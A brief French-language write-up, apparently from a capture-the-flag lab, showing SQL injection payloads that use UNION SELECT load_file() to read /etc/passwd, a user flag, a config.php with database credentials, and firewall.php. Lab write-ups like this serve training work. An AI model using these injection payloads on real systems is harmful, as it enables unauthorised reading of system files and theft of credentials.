SQLI (Read Files) - Pentesting Web

Lecture de /etc/passwd :

jordan' union select load_file('/etc/passwd');-- -

Nous trouvons un utilisateur uhc.

Lecture de user.txt :

jordan' union select load_file('/home/uhc/user.txt');-- -

Lecture de config.php, nous trouvons les identifiants de la base de données :

$servername = "127.0.0.1";
$username = "uhc";
$password = "uhc-11qual-global-pw";
$dbname = "november"

Lecture de firewall.php, nous comprenons que soumettre le flag ouvre le port SSH :



jordan' union select load_file('/var/www/html/firewall.php');-- -

Mis à jour il y a 1 an